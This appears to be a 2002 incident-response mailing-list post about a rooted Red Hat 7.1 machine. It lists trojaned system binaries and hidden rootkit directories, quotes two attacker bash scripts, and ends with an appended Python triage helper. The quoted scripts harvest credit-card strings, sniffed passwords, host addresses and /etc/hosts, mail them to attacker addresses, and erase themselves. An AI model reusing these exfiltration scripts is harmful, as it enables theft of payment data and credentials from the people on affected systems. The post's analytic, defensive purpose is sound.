Security Incidents mailing list archives
questions about a rooted RH7.1 box
From: Christopher Albert <sysadmin () DMS UMontreal CA>
Date: Fri, 12 Apr 2002 17:02:52 -0400
Greetings,

One of the students here got his home box rooted last week. Before he reinstalled I asked him to let me have a look at his box, which I could only do remotely. I took a look at it yesterday for about twenty minutes and collected some stuff, but I had him pull it offline before grave-robber and I were finished because the box seemed just too poisoned and I wasn't comfortable staying connected. I have some questions about what I found, and was wondering if the tools I found were from a familiar rootkit.
1. Most of the attack tools were in /usr/lib/.lib :
libdi libdu libfh libne libnh libvd
libdi = libvd # The 'ls' trojan
libdu = # The 'top' trojan
libne = # The 'netstat' trojan
The 'ps' trojan was in : /usr/lib/libc/libp
/usr/lib/sn : * .sys .X
/usr/lib/ld : * chat .cv .X.X= # Sorts the output from LinSniffer 0.03 [BETA] by Mike Edulla <medulla () infosoc com>
and .sys was its output file. 'chat' seemed to be 'chattr', which was removed from the system. .cv was the output of a script in /usr/man/.../ looking for credit card numbers.
/usr/man/.../ : .c .m # I'll paste these scripts at the end, since they are revealing.
In addition, /usr/bin/kernel seemed to be a trojan sshd, running on ports 6010, 6011.
The scripts .c and .m are :

/usr/man/.../.c

#!/bin/bash
hh="r0ot () emoka ro"
egrep -ir 'mastercard|visa' /home|egrep -v cache >> /usr/lib/ld/.cv
egrep -ir 'mastercard|visa' /var|egrep -v cache >> /usr/lib/ld/.cv
egrep -ir 'mastercard|visa' /root|egrep -v cache >> /usr/lib/ld/.cv
if [ -d "/www" ]; then
egrep -ir 'mastercard|visa' /www >> /usr/lib/ld/.cv
fi
if [ -d "/var/www" ]; then
egrep -ir 'mastercard|visa' /var/www >> /usr/lib/ld/.cv
fi
if [ -f "/usr/lib/ld/.cv" ]; then
/sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v "127.0.0." | grep -v "192.168.0." >> /usr/lib/ld/.cv
hostname -f >> /usr/lib/ld/.cv
cat /usr/lib/ld/.cv | mail -s "cronmonthly" $hh
rm &> /dev/null -rf /usr/lib/ld/.cv
fi
rm &> /dev/null -rf /usr/man/.../.c

/usr/man/.../.m

#!/bin/bash
#/usr/man/.../.m
#
cs="blackeyero () yahoo com"
dp="/usr/lib/ld"
db="/usr/share/rht/..."
wd="/usr/man/.../.w
ml="/usr/man/.../.m
if [ -f "$dp/.i" ]; then
cat $dp/.i >> $dp/.pw
fi
if [ -f "$bla2/.o" ]; then
cat $dp/.o >> $dp/.pw
fi
/sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v "127.0.0." | grep -v "192.168.0." >> $dp/.d
hostname -f >> $dp/.d
cat $dp/.pw >> $dp/.d
if [ -f "/etc/hosts" ]; then
cat /etc/hosts >> $dp/.d
fi
cat $dp/.d | mail -s "cronstate" $cs
cat $dp/.pw >> $db/.p
rm &> /dev/null -rf $dp/.pw $dp/.d $wd $ml

Thought this might be of interest to the group.

Chris

--
--------------------------------------------------------------------
Christopher Albert
Head of IT Services
Department of Mathematics and Statistics
Universite de Montreal
Office 6188, Pavillon Andre-Aisenstadt
Tel: (514) 343-2281 Fax: (514) 343-5700
--------------------------------------------------------------------
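A small triage helper in the spirit of the findings above: it flags dot-prefixed or "..." names under package-managed directories (the /usr/lib/.lib and /usr/man/... hiding spots) and TCP listeners outside a known-good port set (the trojan sshd on 6010/6011). This is an added example, not code from the post; the file listing and netstat excerpt are constructed samples, and the allowed-port set is an assumption.

```python
import re
from typing import Iterable, List, Set

# Constructed `find / -print` excerpt: hiding places from the post plus benign entries.
SAMPLE_PATHS = [
    "/usr/lib/libc.so.6",
    "/usr/lib/.lib/libdi",
    "/usr/lib/ld/.cv",
    "/usr/lib/sn/.sys",
    "/usr/man/.../.c",
    "/usr/man/.../.m",
    "/usr/share/rht/.../.p",
    "/usr/bin/kernel",
    "/home/student/.bashrc",
]

# Constructed `netstat -an` excerpt, not a capture from the post's host.
SAMPLE_NETSTAT = """\
tcp        0      0 0.0.0.0:22        0.0.0.0:*    LISTEN
tcp        0      0 0.0.0.0:6010      0.0.0.0:*    LISTEN
tcp        0      0 0.0.0.0:6011      0.0.0.0:*    LISTEN
"""

# Package-managed trees where a dot-prefixed or "..." name is never legitimate.
SYSTEM_DIRS = ("/usr/lib/", "/usr/man/", "/usr/share/", "/usr/bin/", "/usr/sbin/")
ODD_COMPONENT = re.compile(r"^\.{3,}$|^\.[^.]")  # "..." or a ".name" component

def find_suspicious_paths(paths: Iterable[str]) -> List[str]:
    """Paths under SYSTEM_DIRS that contain a hidden or dots-only component."""
    hits = []
    for p in paths:
        if not p.startswith(SYSTEM_DIRS):
            continue  # dot-files under /home are normal; skip them
        if any(ODD_COMPONENT.match(c) for c in p.split("/")[1:]):
            hits.append(p)
    return hits

def listening_ports(netstat_text: str) -> Set[int]:
    """TCP ports in LISTEN state parsed from `netstat -an` output."""
    ports = set()
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[0].startswith("tcp") and f[5] == "LISTEN":
            ports.add(int(f[3].rsplit(":", 1)[1]))
    return ports

def unexpected_listeners(netstat_text: str, allowed=(22,)) -> List[int]:
    """Listening ports outside the known-good set (the trojan sshd used 6010/6011)."""
    return sorted(listening_ports(netstat_text) - set(allowed))
```

Run it against a real `find` listing and `netstat -an` capture taken from trusted media, since the trojaned ls/ps/netstat on the box itself will hide exactly these entries.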
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com